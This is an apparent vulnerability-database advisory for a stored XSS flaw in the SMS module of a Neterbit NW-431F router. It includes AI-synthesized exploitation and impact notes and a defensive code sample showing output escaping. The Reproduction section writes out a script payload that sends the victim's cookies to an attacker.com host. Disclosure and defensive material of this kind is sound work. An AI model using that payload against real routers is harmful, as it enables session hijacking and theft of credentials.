High severity 7.1 · NVD Advisory · Published Jun 4, 2026 · Updated Jun 4, 2026

CVE-2025-67448

Description

Neterbit NW-431F Router is vulnerable to stored XSS in its SMS module, allowing attackers to execute code in victim browsers.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

The SMS module in Neterbit NW-431F Router versions 20241014-IR03 and earlier is susceptible to stored Cross-Site Scripting (XSS). The application fails to adequately sanitize user-supplied input within SMS messages before storing and subsequently displaying them. This vulnerability exists in the SMS functionality of the router [1].

Exploitation

An attacker can exploit this vulnerability by sending an SMS message containing a malicious XSS payload to the Neterbit NW-431F Router. The payload will be stored by the router and subsequently executed within the context of a victim's web browser when they view the SMS message through the router's interface. No specific authentication or network position requirements are detailed in the available references, but user interaction is implied by viewing the message [1].

Impact

Successful exploitation of this stored XSS vulnerability allows an attacker to execute arbitrary JavaScript code within the victim's browser. This can lead to various malicious actions, such as session hijacking, stealing sensitive information displayed in the browser, or redirecting the user to malicious websites. The impact is limited to the privileges of the user viewing the SMS message in their browser [1].

Mitigation

The fixed version for this vulnerability is not yet available. Users are advised to check for future firmware updates from Neterbit. No workarounds or EOL status are disclosed in the provided references. The vulnerability has not been listed as actively exploited in the wild [1].

AI Insight generated on Jun 4, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 1

Patches: 0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The SMS module fails to sanitize user input before storing and displaying it, allowing for stored XSS."

Attack vector

An attacker can send an SMS containing a malicious XSS payload to the router. The application does not properly sanitize this input before storing it. When a victim views the malicious SMS in their inbox, the XSS payload is executed within the victim's browser context [1]. This can lead to the theft of sensitive information, such as cookies [1].

Affected code

The vulnerability resides in the SMS module of the Neterbit NW-431F Router.

What the fix does

The advisory does not specify a patch or provide details on how the vulnerability is fixed. It states that a fixed version is not available. Users are advised to consult the vendor for remediation guidance.
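
The root cause named above (SMS content stored and displayed without sanitization) is normally closed by encoding stored fields at output time. The following is an added example, not Neterbit's code and not the vendor's fix; the record fields `sender` and `body`, all function names and the sample inbox are assumptions constructed for illustration.

```javascript
// Added example: hypothetical inbox renderer, not Neterbit firmware code.
// Field names (sender, body) and all function names are assumptions.

const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;",
  '"': "&quot;", "'": "&#39;", "`": "&#96;",
};

// Encode every character that can start a tag, start an entity or close an
// attribute value. Single pass, so "&" is never double-encoded.
function escapeHtml(value) {
  return String(value ?? "").replace(/[&<>"'`]/g, (ch) => HTML_ESCAPES[ch]);
}

// Flawed pattern matching the advisory's root cause: stored SMS fields are
// concatenated into markup as-is, so the browser parses them as HTML.
function renderSmsRowUnsafe(sms) {
  return `<tr><td title="${sms.sender}">${sms.sender}</td><td>${sms.body}</td></tr>`;
}

// Hardened form: every stored field is treated as text and encoded for both
// the element-content and the quoted-attribute context it lands in.
function renderSmsRow(sms) {
  const sender = escapeHtml(sms.sender);
  const body = escapeHtml(sms.body);
  return `<tr><td title="${sender}">${sender}</td><td>${body}</td></tr>`;
}

// Build the inbox table; the row renderer is injectable for comparison.
function renderInbox(messages, renderRow = renderSmsRow) {
  return `<table id="sms-inbox">${messages.map((m) => renderRow(m)).join("")}</table>`;
}

// Constructed sample records (not captured from a device).
const SAMPLE_INBOX = [
  { sender: "+15550100", body: "Balance: 10 & counting" },
  { sender: '"><b>x', body: "<script>alert(1)</script>" },
  { sender: null, body: undefined },
];

console.log(renderInbox(SAMPLE_INBOX));
```

In DOM-based interfaces, assigning each field to `textContent` rather than `innerHTML` achieves the same result without a hand-written encoder.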

Preconditions

  • input: The attacker must craft an SMS message containing an XSS payload.
  • network: The attacker must be able to send an SMS to the router.

Reproduction

An attacker composes and sends an SMS with a malicious payload, such as: `<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>`. The victim views the malicious SMS in their inbox. The XSS payload executes, sending the victim's cookies to the attacker's server [1].

Generated on Jun 4, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References: 2
